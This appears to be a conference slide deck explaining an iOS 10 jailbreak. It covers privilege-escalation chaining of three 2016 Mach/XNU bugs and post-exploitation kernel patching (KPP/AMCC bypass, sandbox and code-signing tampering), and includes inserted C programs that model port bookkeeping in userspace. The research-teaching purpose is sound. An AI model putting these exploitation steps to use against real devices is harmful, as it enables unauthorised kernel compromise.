Take a Jailbreak
- Stunning Guards for iOS Jailbreak -
Kaoru Otsuka
Who am I
• An iOS hacking enthusiast

• A first-year high school student at Waseda University High School
Summary
• Escalation to root 

• Escalation to kernel 

• Disabling mitigations for post-exploitation
This talk explains the following three methods
The bugs
• These bugs were found by Ian Beer of Google Project Zero

• CVE-2016-7637

- Broken kernel mach port name uref handling on iOS/MacOS can lead to privileged
port name replacement in other processes

• CVE-2016-7644

- XNU kernel UaF due to lack of locking in set_dp_control_port

• CVE-2016-7661

- MacOS/iOS arbitrary port replacement in powerd
Attack vector
• CVE-2016-7637 and CVE-2016-7661: privilege escalation to root

• CVE-2016-7644 to gain the kernel task port

• Applying patches to disable a bunch of mitigations
CVE-2016-7637
This vulnerability can be used for a man-in-the-middle attack on a Mach port

and leads us to a root task port.
CVE-2016-7637
• The bug is basically a mistake in an overflow check on a counter (the uref
count handled in ipc_right_copyout), not a buffer overflow
CVE-2016-7637
• What does "pegging" mean here?

• Presumably it exists to stop the counter overflowing and wrapping around to 0

• But the concept of "pegging" is hardly used anywhere else in xnu

• Can we exploit it?
Mach IPC system
• The ports targeted by this exploit are reached through ipc_entry
Source: “Through the mach portal”, ianbeer
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=280146
CVE-2016-7637
• The point is that

the UREFS count is pegged at 0xFFFE

and we send messages that would "overflow" it to the target port

• The next UREFS count, which should become 0xFFFF, instead stays at 0xFFFE

• So it turns into an out-of-sync vulnerability: the count no longer matches
the rights actually received

• Let's take a look inside this exploit on the next slide
CVE-2016-7637
• The technique is to send 0x10000 messages (all carrying the same send right)
to the target port

• The messages are made so that mach_msg_server frees them (we send invalid
messages)

• Spraying those messages at the target port: each one is counted into UREFS
and then freed, and each free decrements the count

• This causes the target's port name entry to be freed!

• Let's reallocate there and take control of the target port name
CVE-2016-7637
• There is a mitigation against reallocating a port entry and reusing it (like
a Use-After-Free)

• "ipc_entry" carries a generation number (in "ie_bits")

• The generation number is a 6-bit bit field

• The generation number is checked at the userspace/kernelspace boundary

• The code that increments the generation number is below
CVE-2016-7637
• The generation number has 64 values (no overlap within one cycle)

• So we need a primitive that lets us loop the generation number around, so
that it matches again at the 64th reallocation

• To exploit reliably, the target entry needs to sit approximately in the
middle of the freelist
ipc_entry freelist
• It's a simple LIFO list

• Though the value indicating the next node isn't an address but an index into
"is_table"

• When an entry is freed it is pushed onto the head, and the old head becomes
its next node; allocation pops the head
CVE-2016-7637
• This slide is about improving the reliability of the exploit

• Send N messages (whose entries are reallocated and freed right away) to move
the target entry down the freelist

• After that, send 62 rounds of 2N messages to increment the target entry's
generation number
CVE-2016-7637
• Review of this exploit

• Trigger the UREFS bug

• Send N messages

• Send 62 rounds of 2N messages

• The target entry's generation number now matches again
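As an added example (not code from the talk and not xnu's own code), the following C model reproduces the ipc_entry bookkeeping the last few slides rely on: the LIFO freelist linked by table index, the generation number folded into every port name, the boundary lookup that rejects a stale name, and the effect of the N-message spray on the target's position in the freelist. The macro values are xnu's; the table size, the spray size and the "in use" marker are choices made for the model.

```c
/* Model of xnu's ipc_entry table: LIFO freelist threaded by table index plus a
 * per-entry generation folded into each port name.  Added example, not code
 * from the talk or from xnu.  Macro values are xnu's (osfmk/ipc/ipc_entry.h,
 * osfmk/mach/port.h); TABLE_SIZE and the spray size are model choices. */
#include <stdint.h>
#include <stdio.h>
typedef uint32_t mach_port_name_t, ipc_entry_bits_t;
#define IE_BITS_GEN_MASK    0xFF000000u  /* generation sits in the top byte of ie_bits ... */
#define IE_BITS_GEN_ONE     0x04000000u  /* ... but steps by 1<<26, so only 64 values exist */
#define IE_BITS_GEN(b)      ((b) & IE_BITS_GEN_MASK)
#define IE_BITS_NEW_GEN(o)  (((o) + IE_BITS_GEN_ONE) & IE_BITS_GEN_MASK)
#define MACH_PORT_TYPE_SEND 0x00010000u  /* used here only to mark a slot as in use */
#define MACH_PORT_INDEX(name)      ((name) >> 8)
#define MACH_PORT_GEN(name)        (((name) & 0xffu) << 24)
#define MACH_PORT_MAKE(index, gen) (((index) << 8) | ((gen) >> 24))
#define TABLE_SIZE 256                   /* model only: xnu grows the table on demand */
typedef struct {
    ipc_entry_bits_t ie_bits;  /* right type | urefs | generation */
    uint32_t ie_next;          /* freelist link: a table index, not a pointer */
} ipc_entry_t;
typedef struct { ipc_entry_t table[TABLE_SIZE]; } ipc_space_t;  /* table[0].ie_next is the head */

static void space_init(ipc_space_t *s) {
    for (uint32_t i = 0; i < TABLE_SIZE; i++) {
        s->table[i].ie_bits = 0;
        s->table[i].ie_next = (i + 1 < TABLE_SIZE) ? i + 1 : 0;  /* 0 terminates the list */
    }
    s->table[0].ie_next = 1;  /* entry 0 is reserved; free entries start at 1 */
}

static int entry_alloc(ipc_space_t *s, mach_port_name_t *namep) { /* ipc_entry_alloc */
    uint32_t first = s->table[0].ie_next;
    if (first == 0) return -1;                              /* table full */
    ipc_entry_t *e = &s->table[first];
    s->table[0].ie_next = e->ie_next;                       /* head's successor becomes the head */
    e->ie_bits = IE_BITS_NEW_GEN(e->ie_bits) | MACH_PORT_TYPE_SEND;
    *namep = MACH_PORT_MAKE(first, IE_BITS_GEN(e->ie_bits)); /* the name carries the generation */
    return 0;
}

static void entry_dealloc(ipc_space_t *s, mach_port_name_t name) { /* ipc_entry_dealloc */
    uint32_t idx = MACH_PORT_INDEX(name);
    s->table[idx].ie_bits &= IE_BITS_GEN_MASK;              /* keep only the generation */
    s->table[idx].ie_next = s->table[0].ie_next;            /* the old head becomes our next */
    s->table[0].ie_next = idx;
}

/* ipc_entry_lookup: the user/kernel boundary check; a stale generation byte rejects the name */
static ipc_entry_t *entry_lookup(ipc_space_t *s, mach_port_name_t name) {
    uint32_t idx = MACH_PORT_INDEX(name);
    if (idx == 0 || idx >= TABLE_SIZE) return NULL;
    ipc_entry_t *e = &s->table[idx];
    if (!(e->ie_bits & MACH_PORT_TYPE_SEND) || IE_BITS_GEN(e->ie_bits) != MACH_PORT_GEN(name))
        return NULL;
    return e;
}

int generation_period(void) { /* free/reallocate one slot until it hands out the original name again */
    ipc_space_t s; mach_port_name_t first, cur; int cycles = 0;
    space_init(&s);
    entry_alloc(&s, &first);
    for (cur = first; ; cycles++) {
        entry_dealloc(&s, cur);  /* slot goes to the head ... */
        entry_alloc(&s, &cur);   /* ... and comes straight back with the next generation */
        if (cur == first) return cycles + 1;
    }
}

int stale_name_rejected(void) { /* after one reuse the old name names the same slot but is dead */
    ipc_space_t s; mach_port_name_t old_name, new_name;
    space_init(&s);
    entry_alloc(&s, &old_name);
    entry_dealloc(&s, old_name);
    entry_alloc(&s, &new_name);
    return MACH_PORT_INDEX(old_name) == MACH_PORT_INDEX(new_name)
        && entry_lookup(&s, old_name) == NULL && entry_lookup(&s, new_name) != NULL;
}

/* The "send N messages" step: with the freed target slot at the head, allocate n
 * names (the first reuses the target) and free them in order.  LIFO linking leaves
 * the target n-1 deep, where later rounds of 2n names churn through it. */
int target_depth_after_spray(int n) {
    ipc_space_t s; mach_port_name_t target, names[TABLE_SIZE];
    if (n < 1 || n > TABLE_SIZE - 2) return -1;
    space_init(&s);
    entry_alloc(&s, &target);
    entry_dealloc(&s, target);                              /* target slot is now the head */
    for (int i = 0; i < n; i++) entry_alloc(&s, &names[i]);
    for (int i = 0; i < n; i++) entry_dealloc(&s, names[i]);
    for (uint32_t idx = s.table[0].ie_next, depth = 0; idx != 0; idx = s.table[idx].ie_next, depth++)
        if (idx == MACH_PORT_INDEX(target)) return (int)depth;
    return -1;
}

int main(void) {
    printf("period=%d stale_rejected=%d depth_after_10=%d\n",
           generation_period(), stale_name_rejected(), target_depth_after_spray(10));
    return 0;
}
```

generation_period() is the number the slides call "the 64th reallocation": the slot must be freed and reused that many times before a name a victim already holds becomes valid again, which is why the exploit churns the target entry rather than simply reallocating it once.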
What's suitable as the target port?
• We need a send right for that port

• Kernel-owned ports can't be used, since they are looked up afresh each time
(so, for example, the generation number can't be set up as we need)

• launchd is a great target
launchd
• com.apple.iohideventsystem can be accessed from inside the sandbox, and we
are allowed to hold a send right to it

• Thanks to Apple's insecure design, com.apple.iohideventsystem receives the
task port of its clients

• Man-in-the-middling the target port to capture that task port gives us a
root task port
Task port
• A task port is assigned per task

• A task port can be obtained with task_for_pid, though that API is heavily
restricted

• If we have a process's task port, we can do anything to that process.
CVE-2016-7661
• powerd is a client of com.apple.iohideventsystem

• powerd runs as root

• Crashing powerd (CVE-2016-7661) makes it reconnect, so the target port
(now ours) receives powerd's task port
This vulnerability leads us to the kernel task port
CVE-2016-7644
ipc_port
• ipc_entry holds a reference to an ipc_port (ie_object)

• ipc_entry holds only that reference; the ipc_port object itself lives in a
zone managed by the zone allocator
CVE-2016-7644
• This vulnerability is a kind of Use-After-Free

• set_dp_control_port requires the host privileged port, i.e. root, so we
can't use this bug without the previous exploit
CVE-2016-7644
• Threads can race to see the same value of dynamic_pager_control_port and
each release it

• ipc_port_release_send decrements the reference count io_references
How do we know when the reference count io_references hits 0?
CVE-2016-7644
• Mach has a no-more-senders notification that tells us when ip_srights
reaches 0 through ipc_port_release_send

• The sender count ip_srights is decremented along with the reference count

• So we use that to notice when it reaches 0
no-more-senders
• ipc_port_release_send drops one reference and one send right for the port

• ipc_notify_no_senders sends the notification to port->ip_nsrequest when the
port has no more senders
no-more-senders (walk-through)
The slides show this as a series of ipc_entry table diagrams; the states they
show are:

• portA alone: its ipc_entry's ie_object points at the port, 1 reference,
0 send rights

• Make a reference to that port: portB holds a send right to portA (though it
doesn't receive from portA), 2 references, 1 send right

• portC will be the receiver of the no-more-senders notification,
3 references, 2 send rights

• Trigger that bug! 2 references, 1 send right

• Trigger that bug again! 1 reference, 0 send rights, and the no-more-senders
notification is sent; we got the notification, so we won the race!

• Then, what happens if portB is destroyed? 0 references, 0 send rights

• What is ie_object pointing to now? ipc_entry->ie_object has become
a dangling pointer!
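As an added example (not the talk's code and not xnu's), here is a C model of the reference and send-right counting behind that walk-through. The names follow struct ipc_port, the bookkeeping is reduced to what the sequence needs, and "the bug" is modelled as one ipc_port_release_send too many, which is what two threads racing on dynamic_pager_control_port produce; whether the race was won is read off exactly as the talk does, from whether portC received the notification.

```c
/* Model of the reference and send-right counting behind the no-more-senders
 * trick.  Added example, not code from the talk or from xnu: field names follow
 * struct ipc_port, the bookkeeping is reduced to what the walk-through needs,
 * and "the bug" is one ipc_port_release_send too many, which is what two
 * threads racing on dynamic_pager_control_port produce. */
#include <stdio.h>
#include <string.h>

typedef struct ipc_port {
    int io_references;              /* object refcount: zfree() when it reaches 0 */
    int ip_srights;                 /* outstanding send rights */
    struct ipc_port *ip_nsrequest;  /* who wants the no-more-senders notification */
    int ip_active;
    int notifications;              /* model: notifications delivered to this port */
} ipc_port;
typedef struct { ipc_port *ie_object; } ipc_entry;  /* just the pointer we care about */

static void port_init(ipc_port *p) { memset(p, 0, sizeof *p); p->io_references = 1; p->ip_active = 1; }
static void ip_reference(ipc_port *p) { p->io_references++; }
/* the last reference frees the object; the model keeps the memory so the
 * counters stay readable, where xnu would zfree() it */
static void ip_release(ipc_port *p) { if (--p->io_references == 0) p->ip_active = 0; }
static void ipc_port_make_send(ipc_port *p) { p->ip_srights++; ip_reference(p); } /* +1 right, +1 ref */
static void ipc_port_nsrequest(ipc_port *p, ipc_port *notify) { p->ip_nsrequest = notify; }

/* ipc_port_release_send: drop one send right and one reference; when the send
 * right count hits 0 and someone asked, fire ipc_notify_no_senders. */
static void ipc_port_release_send(ipc_port *p) {
    if (!p->ip_active) { ip_release(p); return; }
    if (p->ip_srights > 0) p->ip_srights--;   /* xnu only asserts this; the model saturates */
    if (p->ip_srights == 0 && p->ip_nsrequest != NULL) {
        ipc_port *n = p->ip_nsrequest;
        p->ip_nsrequest = NULL;
        n->notifications++;                   /* ipc_notify_no_senders(n, m
scount) */
    }
    ip_release(p);
}

struct step { int references; int srights; };
struct walkthrough {
    struct step after[6];  /* portA's counters after each of the six slide states */
    int won_race;          /* portC received the notification */
    int dangling;          /* entryA still points at a port whose refcount reached 0 */
};
#define SNAP(w, i, p) ((w).after[i] = (struct step){ (p).io_references, (p).ip_srights })

/* Replay the slide sequence.  extra_releases is how many times the racing thread
 * released the port on top of the one legitimate release: 1 is the bug, 0 a lost race. */
struct walkthrough run_walkthrough(int extra_releases) {
    struct walkthrough w;
    ipc_port portA, portC;      /* portC only receives the notification */
    ipc_entry entryA, entryB;   /* entryB is the "stashed" send right (portB) */
    memset(&w, 0, sizeof w);
    port_init(&portA); port_init(&portC);
    entryA.ie_object = &portA;                  /* receive right only */
    SNAP(w, 0, portA);
    ipc_port_make_send(&portA);                 /* portB: a send right to portA */
    entryB.ie_object = &portA;
    SNAP(w, 1, portA);
    ipc_port_make_send(&portA);                 /* the right handed to set_dp_control_port */
    ipc_port_nsrequest(&portA, &portC);         /* portC asks for no-more-senders */
    SNAP(w, 2, portA);
    ipc_port_release_send(&portA);              /* the legitimate release of that right */
    SNAP(w, 3, portA);
    for (int i = 0; i < extra_releases; i++)    /* the racing thread releases it again */
        ipc_port_release_send(&portA);
    SNAP(w, 4, portA);
    w.won_race = portC.notifications > 0;
    ipc_port_release_send(entryB.ie_object);    /* destroy portB: its send right goes away */
    entryB.ie_object = NULL;
    SNAP(w, 5, portA);
    w.dangling = entryA.ie_object == &portA && !portA.ip_active;
    return w;
}

int main(void) {
    struct walkthrough w = run_walkthrough(1), lost = run_walkthrough(0);
    for (int i = 0; i < 6; i++)
        printf("state %d: %d references, %d send rights\n", i + 1, w.after[i].references, w.after[i].srights);
    printf("won race: %d, dangling: %d (lost race: %d, %d)\n", w.won_race, w.dangling, lost.won_race, lost.dangling);
    return 0;
}
```

With extra_releases set to 0 the notification only arrives once portB itself is destroyed, and the object is still alive afterwards; that is the difference the exploit uses to tell a won race from a lost one before it proceeds to free the stashed ports.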
zalloc
• zalloc is the kernel's zone allocator: each zone serves objects of one
size/type

• zalloc keeps a freelist per zone

• Zone pages are reclaimed under memory pressure or by mach_zone_force_gc
CVE-2016-7644
• There is a zone for ipc_port, as said before

• We allocate ram_mb*20 ports (early ports)

• Then we allocate 20 ports (middle ports)

• Finally, we allocate 5000 ports (late ports)

• Don't forget to prepare a stashed port (corresponding to portB) for every
port we allocated
CVE-2016-7644
• Trigger the bug for each middle port

• Destroy the stashed ports

• Now we have ipc_entries pointing at dangling port pointers
CVE-2016-7644
• Get the page reused by another kind of zone (currently it belongs to
ipc_ports) so that we can capture the kernel port

• Here we use another technique to gain the kernel task port
Fake ipc_port
• Use the dangling ipc_ports to read or write ip_context

• Overlap the zone page we targeted with ool_ports

• The ool_ports will be misinterpreted as ipc_port members (and vice versa)
Source: "Through the mach portal", ianbeer
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=280146
CVE-2016-7644
• We are aiming to get the kernel task port

• The kernel task port is allocated while bootstrapping the kernel, so it
probably sits on the first page of ipc_ports

• And we can get/set the ip_context of ipc_ports (with
mach_port_{set|get}_context)
CVE-2016-7644
• Rewrite the ip_context of every dangling ipc_port to addresses around the
middle of the first ipc_ports page

(This is the CORE technique of our jailbreak)

• There is a kernel-to-userspace conversion

which converts a "port address" into a "port object" (a port name)

• Using this conversion, once a dangling ipc_port's ip_context has been
rewritten to the address of the kernel task port, the overlapped ool_ports
(whose host_port) become the kernel_task port with some probability!

• As a result, the ool_ports can be used to receive the kernel_task port in a
userspace task.

This lets our userspace task manipulate kernel memory in any way!
Process handling in xnu
• Process handling in xnu is similar to the one in BSD

• There is great benefit in compromising a couple of values in the right
structure
Privilege Escalation
• Most exploits on various platforms use this sort of technique

• A "proc" structure exists per process

• The "allproc" variable heads a linked list of every process's "proc"

• Rewrite the flags and credentials inside the "proc" structure!
“proc” structure
struct proc {
LIST_ENTRY(proc) p_list; /* List of all processes. */
pid_t p_pid; /* Process identifier. (static)*/
void * task; /* corresponding task (static)*/
struct proc * p_pptr; /* Pointer to parent process.(LL) */
pid_t p_ppid; /* process's parent pid number */
pid_t p_pgrpid; /* process group id of the process (LL)*/
uid_t p_uid;
gid_t p_gid;
uid_t p_ruid;
.....
kauth_cred_t p_ucred; /* Process owner's identity. (PUCL) */
.....
uint32_t p_csflags; /* flags for codesign (PL) */
.....
• At first glance, we could just rewrite the values "p_uid" and "p_gid"

• But these fields aren't what the kernel's process management actually
consults

• The real one is the "p_ucred" structure!
"kauth_cred_t"
• "typedef struct ucred *kauth_cred_t;"

• The "ucred" structure is the real credential holder

• So what we should do is copy a highly privileged credential to our process
p_csflags
• Flags for code signing

• Just a 32-bit bitfield

• The attributes are defined in bsd/sys/codesign.h

• Set or clear several values to allow/deny options
p_csflags
• flag |= CS_PLATFORM_BINARY|CS_INSTALLER|CS_GET_TASK_ALLOW

• This allows our task port to be obtained with task_for_pid

• flag &= ~(CS_RESTRICT|CS_KILL|CS_HARD);

• Dropping the troublesome options
AMCC
• Until two months ago it was called KPP; now it is called KTRR or AMCC

• The most annoying mitigation for jailbreakers

• Based on Arm's TrustZone technology

• As of xnu-4570.1.46 it is partially open-sourced (though there seems to be
no sync_handler implementation)
AMCC
• Arm defines 4 exception levels (TrustZone sits at the top)

• EL0 - user-space programs run here

• EL1 - kernel and iBoot (bootloader)

• EL2 - unused on iOS

• EL3 - AMCC/KTRR monitor
AMCC
• AMCC's strategy is to guarantee that kernel regions with read-only or
read|exec-only permissions stay unmodified

• If one of these regions is found to be invalid, AMCC causes a kernel panic

• Bypass the region-checking loop so that we can write anywhere
AMCC
• In theory, it is unavoidable

• In practice, it is not

• Let's descend into the arm abyss!
AMCC
• AMCC needs to read several system registers to know the kernel-space or
user-space state

• We can set these registers if we have kernel execution
System Registers
• TTBR1_EL1

TTBR1_EL1 holds the base address of translation table 1 (the kernel half of
the address space)

• CPACR_EL1

CPACR_EL1 controls access to floating-point and Advanced SIMD functionality
from EL0 and EL1

Its field CPACR_EL1.FPEN (the "NEON" enable) determines whether those
instructions trap
The loop
• EL0: an FPU instruction traps -> EL3 executes sync_handler

• EL0 or EL1: an IRQ -> EL3 executes Watchtower
• It's the core of AMCC

• It presumably checks the integrity of the KTRR regions and of the registers

• If there are invalid pages it triggers a kernel panic

• It sets CPACR_EL1 so that FPU instructions no longer trap
Watchtower
• It is invoked on IRQ

• Its source is in osfmk/arm64/locore.s

• It restores a bunch of registers and sets CPACR_EL1 to trap FPU
instructions again at EL0 and EL1
The solution
• Referring to @qwertyoruiopz's Yalu102 jailbreak

• 1st, load a dummy translation table base address into TTBR1_EL1

• 2nd, set CPACR_EL1 so that EL3 no longer traps us

(but this triggers the check in EL3 now)

• 3rd, load the fake translation table base address into TTBR1_EL1

• 4th, execute "tlbi vmalle1" to invalidate all stage 1 translations

• And patch the instruction touching CPACR to nop
The solution
• The code is below
Shadowmapping technique
• gVirtBase - virtual address of the translation table entries

• gPhysBase - physical address of the translation table entries

• Both of them are kept by pmap

• The technique is to replace the original translation table entry with our
fake translation table entry, which gives us write permission to executable
pages
Problem
• TTBR1_EL1 is reset to 0 on sleep

• There are 2 kinds of sleep

• Idle sleep

sleeping when the CPU is idle

• Deep sleep

sleeping when the screen has been off for more than 30 seconds

• Their state is stored in "struct cpu_data->interrupt_handler"
AMFI
• Apple Mobile File Integrity

• Exists as a daemon and a kext

• The reason attackers target it is that its kext checks the binary's
entitlements, code signing and MAC (Mandatory Access Control) policy
PE_i_can_has_debugger
• Patch the function so that it always returns true (the slide's "a1" is its
first argument in decompiler notation)

• If the function always returns true, many of the checks in the kernel are
turned off
Disabling sandbox
• MAC policies are stored in "mac_policy_conf->mpc_ops" (the mac_policy_ops
table)

• These policies need to be disabled for jailbreaking

• Just rewrite those pointers to null
LwVM
• Lightweight Volume Manager

• LwVM wraps GPT

• _mapForIO intercepts writes to the root partition

• The partition object, marked locked by a flag, is held on the heap

• Clearing this flag lets us write anywhere in the root partition
Remount rootfs
• mac_mount prevents mounting the root partition r/w

• Bypassing this protection works the same way as with LwVM

• The vnode (checked on every mount) has a flag

• Remove that flag and remount the root partition
References
• Through the Mach Portal (Ian Beer)

• yalu102 (Luca Todesco)

• iOS 10 Kernel Heap Revisited (Stefan Esser)

• Mac OS X and iOS Internals (Jonathan Levin)
Demo
Tested on iOS 10.1.1, iPhone 5s

[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman CODE BLUE
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫CODE BLUE
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka CODE BLUE
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
 
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也
[cb22] Mal-gopherとは?Go系マルウェアの分類のためのgimpfuzzy実装と評価 by 澤部 祐太, 甘粕 伸幸, 野村 和也CODE BLUE
 
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
 
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
 

Plus de CODE BLUE (20)

[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...[cb22] Hayabusa  Threat Hunting and Fast Forensics in Windows environments fo...
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...
 
[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl[cb22] Tales of 5G hacking by Karsten Nohl
[cb22] Tales of 5G hacking by Karsten Nohl
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...[cb22]  Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(4) by 板橋 博之
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(3) by Lorenzo Pupillo
 
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...[cb22]  ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman [cb22]  「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション(2)by Allan Friedman
 
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...
 
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by  高橋 郁夫
[cb22] 「協調された脆弱性開示の現在と未来」国際的なパネルディスカッション (1)by 高橋 郁夫
 
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...
 
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka [cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
[cb22] Wslinkのマルチレイヤーな仮想環境について by Vladislav Hrčka
 
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...
 
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...
 
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...[cb22]  From Parroting to Echoing:  The Evolution of China’s Bots-Driven Info...
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...
 
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...[cb22]  Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...
 
